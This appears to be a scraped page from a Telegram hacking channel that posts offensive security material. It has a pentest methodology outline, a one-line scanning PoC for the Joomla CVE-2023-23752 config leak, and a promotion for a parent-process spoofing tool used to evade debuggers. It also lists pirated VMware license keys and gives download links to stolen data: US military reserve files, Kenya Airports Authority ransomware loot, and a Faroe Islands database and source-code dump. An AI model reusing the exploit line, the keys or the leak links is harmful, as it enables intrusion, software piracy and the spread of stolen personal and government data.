Cyber0жff666 λ
115 subscribers
167 photos
209 files
522 links
Cyber intelligence corporation.

C, C++, Assembly, UNIX, Malwares, Ransomwares, Information Security, Networks and Anonymity

new group link in: @intell666
Download Telegram
1 - Information Gathering
Discover Network Hosts
Enumerate Listening Services
Discover Vulnerabilities


2 - Focused Penetration
Compromise Vulnerable Hosts (level 1)
[Exploit missing software patches]
[Deploy custom executable payloads]
[Acess remote management interfaces - RMI]


3 - Privilege Escalation
Estabilish Persistent Re-entry
Havest User Credentials
Pass Credentials to New Hosts(level 2)
[Identify privileged user accountd]
[Elevate to domain admin]


4 - Documentation
Gather Screenshots
Create Linear Attack Narratives
Create Final Deliverable

Enjoy
@CyberTemple
⭕️CVE-2023-23752
Joomla webservice endpoint access
PoC
httpx -l ip.txt -path '/api/index.php/v1/config/application?public=true'
🔞 US military contractor files and Puerto Rican reserve files leak.

Details: The two files are sets of documents regarding the US military reserve in Puerto Rico and of contractors that work with the military. These were both obtained in 2022 and these have been leaked in response to the atrocious acts that US has been involved in all these years without regard for human lives.

➡️Download links(updated V2):
https://anonfiles.com/b29eud70y1/USArmyReservePR.part2_rar

https://anonfiles.com/WdB2t971y6/USArmyReservePR.part1_rar

https://drive.google.com/file/d/1ClMiJBbDrBWJWsXF2edpaq6LA7VCzszt/view?usp=sharing

➡️Backup links:
https://bayfiles.com/b05cw473yb/USArmyReservePR.part1_rar
https://bayfiles.com/d9r9x57eyd/USArmyReservePR.part2_rar
https://upload.st/DdNbw77aye/USArmyReservePR.part1_rar
https://upload.st/ubffx773y5/USArmyReservePR.part2_rar
👏1
⭕️One of the methods of debugger detection used in malware or commercial software is parent process checking. In debugger we can use Anti-Debug plugins, but what about out of debugger ?

⭕️With SB-Loader you can patch process memory or run any process under explorer.exe or any desired process.

Features :
Select the parent process with process name
Select the parent process with process id
Run the child process with process argument
Memory patcher

🌐 Project Link
👍1
𝙊𝙎𝙄𝙉𝙏, 𝙂𝙚𝙤𝙡𝙤𝙘𝙖𝙩𝙞𝙤𝙣 𝙏𝙚𝙘𝙝𝙣𝙞𝙦𝙪𝙚𝙨 𝙖𝙣𝙙 𝙏𝙝𝙧𝙚𝙖𝙩 𝙄𝙣𝙩𝙚𝙡𝙡𝙞𝙜𝙚𝙣𝙘𝙚 𝙈𝙖𝙥𝙥𝙞𝙣𝙜 𝙄𝙣 𝙈𝙚𝙭𝙞𝙘𝙤

Link 🔗:-
https://www.cyberoneintel.com/post/osint-geolocation-techniques-and-threat-intelligence-mapping

Tools 🛠️:-
https://www.cyberoneintel.com/tools
Network Nightmare Mindmap.

It is a mindmap for conducting network attacks. For the most part, it will be useful to pentesters or red team operators.

Traffic Hijacking;
MiTM Attacks;
Dynamic IGP Routing;
Configuration Exfiltration;
DoS;
NAC/802.1X Bypassing;
GRE Pivoting;
Cisco EEM for hiding user;
Authentication Cracking;
Information Gathering;
Cisco Passwords;
VLAN Bypassing.

https://github.com/c4s73r/NetworkNightmare/blob/main/NetworkNightmare_by_Caster.pdf
1
🔑 VMware Workstation Keys 🔑

VMware Workstation 15 Pro:

ZG51K-25FE1-H81ZP-95XGT-WV2C0

VMware Workstation 16 Pro:

6JZPU-P8NYG-11Q12-ZZZ5R-ZQEGZ
ZF3R0-FHED2-M80TY-8QYGC-NPKYF
YF390-0HF8P-M81RQ-2DXQE-M2UT6
ZF71R-DMX85-08DQY-8YMNC-PPHV8
AZ3E8-DCD8J-0842Z-N6NZE-XPKYF
FC11K-00DE0-0800Z-04Z5E-MC8T6

VMware workstation 17 Pro:

MC60H-DWHD5-H80U9-6V85M-8280D
4A4RR-813DK-M81A9-4U35H-06KND
NZ4RR-FTK5H-H81C1-Q30QH-1V2LA
4C21U-2KK9Q-M8130-4V2QH-CF810
4Y09U-AJK97-089Z0-A3054-83KLA
𝙋𝙝𝙤𝙩𝙊𝙎𝙄𝙉𝙏 - extension allows you to view photo metadata without leaving your browser. Very convenient and most importantly - fast.

Link 🔗:-
https://chrome.google.com/webstore/detail/photosint/gonhdjmkgfkokhkflfhkbiagbmoolhcd
30 𝙊𝙎𝙄𝙉𝙏 𝙚𝙭𝙩𝙚𝙣𝙨𝙞𝙤𝙣𝙨 𝙛𝙤𝙧 𝙂𝙤𝙤𝙜𝙡𝙚 𝘾𝙝𝙧𝙤𝙢𝙚

Useful extensions for Google Chrome that will help you analyze data from open sources and will be useful in your work

Link 🔗:-
https://www.osintme.com/index.php/2021/06/30/30-best-osint-extensions-for-google-chrome/
🔥1
Ransomware | Kenya Airports Authority (a few pics+filetree)

https://bayfiles.com/h2s1E4b2z4/kenya_rar
https://anonfiles.com/j4saE0b4zd/kenya_rar
Faroe Islands Leak

In this 30GB data leak, lots of user data has been leaked, as well as their beautiful source code!

DATABASES:
https://anonfiles.com/R1t8Wab9z4/vfi_dbs_zip

SOURCE CODE:
https://anonfiles.com//99c7P2bdz1//vfi_z01 (15GB)
https://anonfiles.com//Z4a2Q6bcze//vfi_zip (15GB)